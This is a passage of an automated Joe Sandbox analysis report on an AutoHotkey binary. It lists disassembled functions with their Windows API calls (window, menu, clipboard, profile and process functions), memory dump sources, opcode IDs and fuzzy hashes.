                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: ErrorLast
                                      • String ID: Failed to open file.$FileOpen$Parameter #2 invalid.
                                      • API String ID: 1452528299-3221046509
                                      • Opcode ID: 0c0f12cb5d91ef92a9e9511ce7a622be048316391caf8a2819497b72b7b72bc0
                                      • Instruction ID: ecfacad556fae9cd62b5aaffb8a84ef9c01bc7bffeefbcdf6bebdd61ca0c48e4
                                      • Opcode Fuzzy Hash: 0c0f12cb5d91ef92a9e9511ce7a622be048316391caf8a2819497b72b7b72bc0
                                      • Instruction Fuzzy Hash: 268112716002019BD7209B64D881BAA73A0AB54325F248277ED2D9B3D2E77CEC5CC79E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0042D170 Relevance: 6.2, APIs: 4, Instructions: 232COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: afcc29302b509d8c6850215bb0fad76ab565fc6bebd083cd75f735ae3921b461
                                      • Instruction ID: 017cb0ce53dc504432268c5b393a63c826e67869871cf2f893efdf2633aca59c
                                      • Opcode Fuzzy Hash: afcc29302b509d8c6850215bb0fad76ab565fc6bebd083cd75f735ae3921b461
                                      • Instruction Fuzzy Hash: 1281D436B083559BD734DA58E884BABB3E1BF88310F98055EE98547342D735EC06C7A6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00480150 Relevance: 6.2, APIs: 4, Instructions: 184COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0cc2b10caeb3e3ca11efa447773b049f1826fea206a457b3fa0931986c900535
                                      • Instruction ID: a4ff9923861d801b0d9b259961a466d2b3c1668708d8524f113c9fc796d6b299
                                      • Opcode Fuzzy Hash: 0cc2b10caeb3e3ca11efa447773b049f1826fea206a457b3fa0931986c900535
                                      • Instruction Fuzzy Hash: 22513572A243158BCB50BF28D88456F73E1AF94324F410D6BEC8597340E379DE89C79A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004844A0 Relevance: 6.1, APIs: 4, Instructions: 142windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32(?,?,?,?,0040F2F8,004D8348,?,?,004B0CF8,004B0CF8,00000000), ref: 004844F7
                                      • IsWindowVisible.USER32(00000000), ref: 00484513
                                      • GetForegroundWindow.USER32(?,?,?,?,0040F2F8,004D8348,?,?,004B0CF8,004B0CF8,00000000), ref: 00484553
                                      • IsWindowVisible.USER32(00000000), ref: 004845C0
                                        • Part of subcall function 004852F0: LoadLibraryW.KERNEL32(dwmapi.dll,DwmGetWindowAttribute,?,004845D4,00000000,?,?,?,?,0040F2F8,004D8348,?,?,004B0CF8,004B0CF8,00000000), ref: 0048530B
                                        • Part of subcall function 004852F0: GetProcAddress.KERNEL32(00000000), ref: 00485312
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Window$ForegroundVisible$AddressLibraryLoadProc
                                      • String ID:
                                      • API String ID: 559202094-0
                                      • Opcode ID: b545d771339426218fa1725354f590505fb62e7cbfead9e03966db733ce6fc1a
                                      • Instruction ID: 04a802663e5bac835367d810c835cb1bab2c5c04672bc5b6e84d993adf71ba12
                                      • Opcode Fuzzy Hash: b545d771339426218fa1725354f590505fb62e7cbfead9e03966db733ce6fc1a
                                      • Instruction Fuzzy Hash: 78519D71A443819BC734BF69D8805EFB7E5ABC1310F44892FEB4887700EB389944DB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004487E0 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcstoi64
                                      • String ID:
                                      • API String ID: 398114495-0
                                      • Opcode ID: 912974b8d22a1d2096e62d0d75c659c88c4203600bf176ca68ec6a72dfc00579
                                      • Instruction ID: 282f46bad3b0889d707567502305a71e5f238f0655638e7af4ea5475e0d51f95
                                      • Opcode Fuzzy Hash: 912974b8d22a1d2096e62d0d75c659c88c4203600bf176ca68ec6a72dfc00579
                                      • Instruction Fuzzy Hash: 2C417B71A0050166E7107F28CC417AF77A0EF96354F84457FE981A73A1EF2A9906878F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0047C460 Relevance: 6.1, APIs: 4, Instructions: 113COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFullPathNameW.KERNEL32(?,00008000,?,?), ref: 0047C489
                                        • Part of subcall function 0047C320: FindFirstFileW.KERNEL32(?,?,?,?,?), ref: 0047C36C
                                        • Part of subcall function 0047C320: FindClose.KERNEL32(00000000,?,?), ref: 0047C378
                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0047C4B6
                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0047C509
                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0047C51E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: PrivateProfileWrite$FindString$CloseFileFirstFullNamePathSection
                                      • String ID:
                                      • API String ID: 1032437609-0
                                      • Opcode ID: 5b350a406a2e1d3b0bd45fe81f78c980fa73d0c0683d9715a5ec43827c618d9f
                                      • Instruction ID: aad235075cda5840ddf15c5a59e006a9fda1056257976024b8c2b4e5fb1c3132
                                      • Opcode Fuzzy Hash: 5b350a406a2e1d3b0bd45fe81f78c980fa73d0c0683d9715a5ec43827c618d9f
                                      • Instruction Fuzzy Hash: DF310772600224A7C730DB55DC82FEBB3A8EB48711F11416FFA49971C0DBB9AA44C7AD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045D865 Relevance: 6.1, APIs: 4, Instructions: 104windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageTimeoutW.USER32(?,000000B0,?,?,00000002,000007D0,?), ref: 0045D884
                                      • SendMessageTimeoutW.USER32(?,000000C9,?,00000000,00000002,000007D0,?), ref: 0045D8A5
                                      • SendMessageTimeoutW.USER32(?,000000C9,?,00000000,00000002,000007D0,00000000), ref: 0045D8D2
                                      • SendMessageTimeoutW.USER32(?,000000C9,?,00000000,00000002,000007D0,00000000), ref: 0045D903
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: MessageSendTimeout
                                      • String ID:
                                      • API String ID: 1599653421-0
                                      • Opcode ID: e1d4de32cb75c72ff3a665b992f7985cca3c52bb1597d04716bb5b70e3de95a5
                                      • Instruction ID: f502961f222757b09b173b8723e0a84d29d9820b4bf67e88ed046491165300dd
                                      • Opcode Fuzzy Hash: e1d4de32cb75c72ff3a665b992f7985cca3c52bb1597d04716bb5b70e3de95a5
                                      • Instruction Fuzzy Hash: 65317631B4420AAAEB20DB94CD86FBF7378AF44B11F50051BBA10B71C5D7B4AD058B69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004A5614 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004A5648
                                      • __isleadbyte_l.LIBCMT ref: 004A567B
                                      • MultiByteToWideChar.KERNEL32(54896610,00000009,?,00009B8D,00000000,00000000,?,?,?,0047FFCE,?,00000000), ref: 004A56AC
                                      • MultiByteToWideChar.KERNEL32(54896610,00000009,?,00000001,00000000,00000000,?,?,?,0047FFCE,?,00000000), ref: 004A571A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                      • String ID:
                                      • API String ID: 3058430110-0
                                      • Opcode ID: f1c0cbb46028742cddeeabdb6f39c5770d1713c82041af1350c6b4449f5e9439
                                      • Instruction ID: 053bf56ac3b2a1a10f7cbe9ea9734cf65070de86fa1b7b24f9f5d07099f245c0
                                      • Opcode Fuzzy Hash: f1c0cbb46028742cddeeabdb6f39c5770d1713c82041af1350c6b4449f5e9439
                                      • Instruction Fuzzy Hash: 7231D031A00645EFDF20DF64CA909AE3BB5BF12320F54856AF4698B2A1D734DD41DB58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004613D0 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID:
                                      • API String ID: 1473721057-0
                                      • Opcode ID: 9bf9a7e18a1b9a9841391fe688b112847d4bb547458aa54bc548a078e5bd0846
                                      • Instruction ID: 456a1dec3eabca1184ace4e6fcd9c3ec7d8270873f49a9fa7996e5db1036ed21
                                      • Opcode Fuzzy Hash: 9bf9a7e18a1b9a9841391fe688b112847d4bb547458aa54bc548a078e5bd0846
                                      • Instruction Fuzzy Hash: 7121D835A002145F8B10DF68E8548ABB7A8EB49720B08866BFC1DC7720FA39DC40C7DA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00477330 Relevance: 6.1, APIs: 4, Instructions: 90windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • IsMenu.USER32(00000000), ref: 00477344
                                      • GetMenu.USER32(?), ref: 00477370
                                      • DestroyMenu.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,00477448), ref: 00477384
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Menu$Destroy
                                      • String ID:
                                      • API String ID: 3525833831-0
                                      • Opcode ID: 1ab50c7b951d9841d7ebfe004a67e4749bd224388caa69187858eaa742f4fbd6
                                      • Instruction ID: ca522f25b28d59f96715409ddbff0f599ce172e184fcd812eb730cca2e9963e6
                                      • Opcode Fuzzy Hash: 1ab50c7b951d9841d7ebfe004a67e4749bd224388caa69187858eaa742f4fbd6
                                      • Instruction Fuzzy Hash: 91318E317092108BCB319F259880AABB7A9BB44715B95C56BDC4DDB701D738FC01EB98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00419580 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp_wcstoul
                                      • String ID:
                                      • API String ID: 372159744-0
                                      • Opcode ID: 23a24e614f6adf592575801a7617b7edbb29059bbe2d2977a5bc2b380159e94a
                                      • Instruction ID: 48ab1264c1f3e2513e1339f7f3f6957a052dda347a77d7802f6317311058c9cd
                                      • Opcode Fuzzy Hash: 23a24e614f6adf592575801a7617b7edbb29059bbe2d2977a5bc2b380159e94a
                                      • Instruction Fuzzy Hash: 85115932A5435126DA04DB596C02FDBB388AF9431CF04442BF84CDB382E36EAD5583BE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0049D0A0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __getptd_noexit
                                      • String ID:
                                      • API String ID: 3074181302-0
                                      • Opcode ID: b71f1d9349aaa6b989ff4b036c968748f26520325c77309ec9d427f6277dfa33
                                      • Instruction ID: fd4faa91100aeec74243ef131622ab50da2005724697169e90061361adc7a38a
                                      • Opcode Fuzzy Hash: b71f1d9349aaa6b989ff4b036c968748f26520325c77309ec9d427f6277dfa33
                                      • Instruction Fuzzy Hash: F811B172901214ABDF206B62DC06B9F7F68EB857A4F104137F952972A0D6388D41E66C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004683EC Relevance: 6.1, APIs: 4, Instructions: 66windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00468001
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00468410
                                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 0046842D
                                      • ShowWindow.USER32(00000000,-00000001), ref: 00468455
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Window$LongMessageSendShow_free
                                      • String ID:
                                      • API String ID: 592510501-0
                                      • Opcode ID: 946cfd1854ea6baecf5d3fbefeadeebaf197389b583760f4c850b6442fda712c
                                      • Instruction ID: 65927e7df1ee3fec00fcd4f1efc2459e2e670b4a20e478b1079a7bccd7d21ced
                                      • Opcode Fuzzy Hash: 946cfd1854ea6baecf5d3fbefeadeebaf197389b583760f4c850b6442fda712c
                                      • Instruction Fuzzy Hash: F3112770A0520097DB108F24DC84B5F3BA1AB45724F08862BF8558A3C1EB3CD941D70F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045B520 Relevance: 6.1, APIs: 4, Instructions: 61keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: State
                                      • String ID:
                                      • API String ID: 1649606143-0
                                      • Opcode ID: ae341c156ab94e3b96d27d800ef6470bdf16826c7294baa3a0f88d59318a5a13
                                      • Instruction ID: b4af31304add5ae873a0f79e27a9e044c9b777aee00d62d5844ba6f117515b0f
                                      • Opcode Fuzzy Hash: ae341c156ab94e3b96d27d800ef6470bdf16826c7294baa3a0f88d59318a5a13
                                      • Instruction Fuzzy Hash: 4F1108B0860118AADF1C9B3898253FA37D1F74174BFC8049BF849CA593E72D854EE65D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00413690 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 29120c9d057372807344aa45bbf6734d465b62690172e93c224a0efcbe0e6366
                                      • Instruction ID: 27f7e7a5d6eb0ec7b1bb2f871385b39b1c1c53c2c545ed48017c2409dfe2ca06
                                      • Opcode Fuzzy Hash: 29120c9d057372807344aa45bbf6734d465b62690172e93c224a0efcbe0e6366
                                      • Instruction Fuzzy Hash: 84113AB5600B00AFC620DF69C881B97B3E9FF88704F14892DE15A87390DB39E941CB95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004695D0 Relevance: 6.1, APIs: 4, Instructions: 51windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMenu.USER32(?), ref: 004695FC
                                      • IsWindowVisible.USER32(?), ref: 00469610
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,?,?,00000000,02D91808,00477321,00000000), ref: 00469632
                                      • RedrawWindow.USER32(?,00000000,00000000,00000501,?,?,00000000,02D91808,00477321,00000000), ref: 00469649
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Window$MenuRedrawVisible
                                      • String ID:
                                      • API String ID: 1537645765-0
                                      • Opcode ID: 54d3c51baba4205a6de62fe157bf6c7f7938ca2e17597b7112b719cb91bfe84c
                                      • Instruction ID: bf47edb6da4a49d43236b16943f40b22b48320f994cecc47d9aa27ec59f282b4
                                      • Opcode Fuzzy Hash: 54d3c51baba4205a6de62fe157bf6c7f7938ca2e17597b7112b719cb91bfe84c
                                      • Instruction Fuzzy Hash: B4014439601210ABD610EF54EDC0F2AB369A78AB04F15805EE64297395C7B1FC02CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405260 Relevance: 6.0, APIs: 4, Instructions: 45clipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalUnlock.KERNEL32(00000000,74DEE0D0,?,00000000,00405259,SetClipboardData), ref: 0040527C
                                      • CloseClipboard.USER32 ref: 00405281
                                      • GlobalUnlock.KERNEL32(00000000,74DEE0D0,?,00000000,00405259,SetClipboardData), ref: 00405295
                                      • GlobalFree.KERNEL32(00000000), ref: 004052A5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Global$Unlock$ClipboardCloseFree
                                      • String ID:
                                      • API String ID: 1156981608-0
                                      • Opcode ID: 397e1e4a5e3e2d4515154c781677c611164b3b03119fa5e87c9b9fc860f5bac4
                                      • Instruction ID: 5ec439159a9543964d4c77333bfff5f4b07931456218355697841b68456fe8c9
                                      • Opcode Fuzzy Hash: 397e1e4a5e3e2d4515154c781677c611164b3b03119fa5e87c9b9fc860f5bac4
                                      • Instruction Fuzzy Hash: 3001DA75900B049FC3209F9AD984827F7F9FFA4711310C92FE59693A50D739A855CF29
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004815F0 Relevance: 6.0, APIs: 4, Instructions: 36memorythreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 004815FA
                                      • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 0048160B
